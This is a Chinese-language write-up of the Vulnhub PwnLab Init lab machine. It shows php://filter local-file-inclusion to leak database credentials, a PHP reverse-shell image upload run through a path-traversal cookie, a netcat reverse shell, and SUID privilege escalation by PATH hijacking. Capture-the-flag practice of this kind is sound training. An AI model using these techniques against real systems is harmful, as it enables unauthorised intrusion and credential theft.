Vulnhub PwnLab Init靶机解题过程
PwnLab Init
本靶机的要点:
- 本地文件包含漏洞(需要用到Filter bypass技术)
- 如何利用Cookie执行图片马
识别目标主机的IP地址
(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.91.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:53:de:4e 1 60 PCS Systemtechnik GmbH
192.168.56.139 08:00:27:c6:fb:d4 1 60 PCS Systemtechnik GmbH
利用Kali 自带的netdiscover工具识别目标主机的IP地址为192.168.56.139
NMAP扫描
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.139 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-29 05:43 EDT
Nmap scan report for bogon (192.168.56.139)
Host is up (0.00015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: PwnLab Intranet Image Hosting
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39141/udp6 status
| 100024 1 39425/tcp status
| 100024 1 47752/udp status
|_ 100024 1 52535/tcp6 status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47-0+deb8u1
| Thread ID: 38
| Capabilities flags: 63487
| Some Capabilities: LongPassword, IgnoreSigpipes, Speaks41ProtocolNew, Speaks41ProtocolOld, ODBCClient, DontAllowDatabaseTableColumn, ConnectWithDatabase, FoundRows, Support41Auth, InteractiveClient, IgnoreSpaceBeforeParenthesis, LongColumnFlag, SupportsLoadDataLocal, SupportsCompression, SupportsTransactions, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: %jjTE;;RlJk^rEBXsZH:
|_ Auth Plugin Name: mysql_native_password
39425/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:C6:FB:D4 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds
Get Access
对NMAP扫描出来的端口逐个进行分析
─(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ curl http://192.168.56.139
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
Use this server to upload and share image files inside the intranet</center>
</body>
</html>
虽然页面有upload的功能,但是必须先login
接下来看一下是否存在利用sql注入旁路登录验证漏洞,尝试失败。
──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ gobuster dir -u http://192.168.56.139 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.139
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/10/29 05:54:52 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.139/images/]
/upload (Status: 301) [Size: 317] [--> http://192.168.56.139/upload/]
/server-status (Status: 403) [Size: 302]
Progress: 207187 / 207644 (99.78%)===============================================================
2022/10/29 05:55:23 Finished
===============================================================
到目前为止都没有明显的收获。
──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ nikto -h http://192.168.56.139
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.139
+ Target Hostname: 192.168.56.139
+ Target Port: 80
+ Start Time: 2022-10-29 06:04:09 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2022-10-29 06:05:02 (GMT-4) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
这里提示/config.php可能包含数据库用户名和密码
─(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ curl http://192.168.56.139/config.php
但是访问改文件,没有任何返回结果
从URL:(http://192.168.56.139/?page=login 看是否有LFI本地文件包含漏洞,但是测试没有返回返回,可能有某种过滤机制,因此尝试绕开这种过滤
──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ curl http://192.168.56.139/?page=php://filter/convert.base64-encode/resource=config
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+</center>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ echo "PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+" | base64 -d
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
成功得到数据库的用户名以及密码
登录数据库
─$ mysql -h 192.168.56.139 -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 107
Server version: 5.5.47-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Users |
+--------------------+
2 rows in set (0.001 sec)
MySQL [(none)]> use users;
ERROR 1044 (42000): Access denied for user 'root'@'%' to database 'users'
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.001 sec)
MySQL [Users]> select * from users
-> ;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.001 sec)
MySQL [Users]>
得到了3个用户名以及密码(base64编码)
──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ echo "Sld6WHVCSkpOeQ==" |base64 -d
JWzXuBJJNy
┌──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ echo "U0lmZHNURW42SQ==" | base64 -d
SIfdsTEn6I
┌──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ echo "aVN2NVltMkdSbw==" | base64 -d
iSv5Ym2GRo
从前面的信息收集过程知道,用户可以上传文件,因此用上述得到的用户名密码登录
上传shell.php时,返回错误:Not allowed extension, please upload images only.
先利用前面类似的LFI,本地文件漏洞,看一下upload.php文件的源代码
访问:
http://192.168.56.139/?page=php://filter/convert.base64-encode/resource=upload
─(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ echo "PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCmlmICghaXNzZXQoJF9TRVNTSU9OWyd1c2VyJ10pKSB7IGRpZSgnWW91IG11c3QgYmUgbG9nIGluLicpOyB9DQo/Pg0KPGh0bWw+DQoJPGJvZHk+DQoJCTxmb3JtIGFjdGlvbj0nJyBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KCQkJPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2ZpbGUnIGlkPSdmaWxlJyAvPg0KCQkJPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJy8+DQoJCTwvZm9ybT4NCgk8L2JvZHk+DQo8L2h0bWw+DQo8P3BocCANCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQoJaWYgKCRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA8PSAwKSB7DQoJCSRmaWxlbmFtZSAgPSAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXTsNCgkJJGZpbGV0eXBlICA9ICRfRklMRVNbJ2ZpbGUnXVsndHlwZSddOw0KCQkkdXBsb2FkZGlyID0gJ3VwbG9hZC8nOw0KCQkkZmlsZV9leHQgID0gc3RycmNocigkZmlsZW5hbWUsICcuJyk7DQoJCSRpbWFnZWluZm8gPSBnZXRpbWFnZXNpemUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddKTsNCgkJJHdoaXRlbGlzdCA9IGFycmF5KCIuanBnIiwiLmpwZWciLCIuZ2lmIiwiLnBuZyIpOyANCg0KCQlpZiAoIShpbl9hcnJheSgkZmlsZV9leHQsICR3aGl0ZWxpc3QpKSkgew0KCQkJZGllKCdOb3QgYWxsb3dlZCBleHRlbnNpb24sIHBsZWFzZSB1cGxvYWQgaW1hZ2VzIG9ubHkuJyk7DQoJCX0NCg0KCQlpZihzdHJwb3MoJGZpbGV0eXBlLCdpbWFnZScpID09PSBmYWxzZSkgew0KCQkJZGllKCdFcnJvciAwMDEnKTsNCgkJfQ0KDQoJCWlmKCRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvZ2lmJyAmJiAkaW1hZ2VpbmZvWydtaW1lJ10gIT0gJ2ltYWdlL2pwZWcnICYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvanBnJyYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvcG5nJykgew0KCQkJZGllKCdFcnJvciAwMDInKTsNCgkJfQ0KDQoJCWlmKHN1YnN0cl9jb3VudCgkZmlsZXR5cGUsICcvJyk+MSl7DQoJCQlkaWUoJ0Vycm9yIDAwMycpOw0KCQl9DQoNCgkJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gbWQ1KGJhc2VuYW1lKCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkuJGZpbGVfZXh0Ow0KDQoJCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkdXBsb2FkZmlsZSkpIHsNCgkJCWVjaG8gIjxpbWcgc3JjPVwiIi4kdXBsb2FkZmlsZS4iXCI+PGJyIC8+IjsNCgkJfSBlbHNlIHsNCgkJCWRpZSgnRXJyb3IgNCcpOw0KCQl9DQoJfQ0KfQ0KDQo/Pg==" | base64 -d
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");
if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}
if(strpos($filetype,'image') === false) {
die('Error 001');
}
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}
if(substr_count($filetype, '/')>1){
die('Error 003');
}
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src=\"".$uploadfile."\"><br />";
} else {
die('Error 4');
}
}
}
?>
看的出来该页面有白名单机制,至允许.jpg, .jpeg,.gif,.png文件上传
因此需要设法绕开白名单,制作图片木马
随便找一张图片,用编辑器比如vim打开,将php reverse shell代码粘到最后,然后上传。
成功上传图片马。
上传后,地址为:
http://192.168.56.139/upload/a7c3ce076585477741d951d179ab07dc.jpg
访问该文件,并没有得到shell
说明图片马没有被执行,需要找另外的执行路径
对index.php源代码进行分析(用本地包含漏洞)
┌──(kali㉿kali)-[~/Vulnhub/Pwnlab_init]
└─$ echo "PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4=" | base64 -d
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
其中这段代码表明会去执行Cookie[‘lang']因此用burpsuite修改cookie值
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
利用bup拦截请求(访问http://192.168.56.139/index.php),在cookie中增加lang=../upload/a7c3ce076585477741d951d179ab07dc.jpg
成功拿到shell
─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.139] 38576
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
15:41:41 up 2:01, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@pwnlab:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@pwnlab:/$
由于前面有拿到用户名和密码,所以猜测该用户名和密码也是操作系统上的用户名和密码
kent@pwnlab:~$ find / -type f -perm /4000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
kent@pwnlab:~$ sudo -l
sudo -l
-su: sudo: command not found
kent@pwnlab:~$ ls -alh
ls -alh
total 20K
drwxr-x--- 2 kent kent 4.0K Mar 17 2016 .
drwxr-xr-x 6 root root 4.0K Mar 17 2016 ..
-rw-r--r-- 1 kent kent 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 kent kent 3.5K Mar 17 2016 .bashrc
-rw-r--r-- 1 kent kent 675 Mar 17 2016 .profile
kent@pwnlab:~$
没有可以利用的信息,看一下其他用户
kent@pwnlab:~$ su - kane
su - kane
Password: iSv5Ym2GRo
kane@pwnlab:~$ id
id
uid=1003(kane) gid=1003(kane) groups=1003(kane)
kane@pwnlab:~$ sudo -l
sudo -l
-su: sudo: command not found
kane@pwnlab:~$ find / -type f -perm /4000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/home/kane/msgmike
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
发现了msgmike有suid位可以被用来提权
kane@pwnlab:~$ /home/kane/msgmike
/home/kane/msgmike
cat: /home/mike/msg.txt: No such file or directory
这个msgmike是利用cat显示什么内容
kane@pwnlab:~$ echo '/bin/sh' > cat
echo '/bin/sh' > cat
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ export PATH=./:$PATH
export PATH=./:$PATH
kane@pwnlab:~$ ls
ls
cat msgmike
kane@pwnlab:~$ ./msgmkie
./msgmkie
-su: ./msgmkie: No such file or directory
kane@pwnlab:~$ export PATH=:./:$PATH
export PATH=:./:$PATH
kane@pwnlab:~$ pwd
pwd
/home/kane
kane@pwnlab:~$ ./msgmike
./msgmike
$ id
id
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
$
执行msgmike后用户改为Mike了
这是在mike目录下看到了msgroot,而且该可执行分析有S位,执行它
发现是显示输入的内容,执行命令注入 (用分号)
STRIVE FOR PROGRESS,NOT FOR PERFECTION
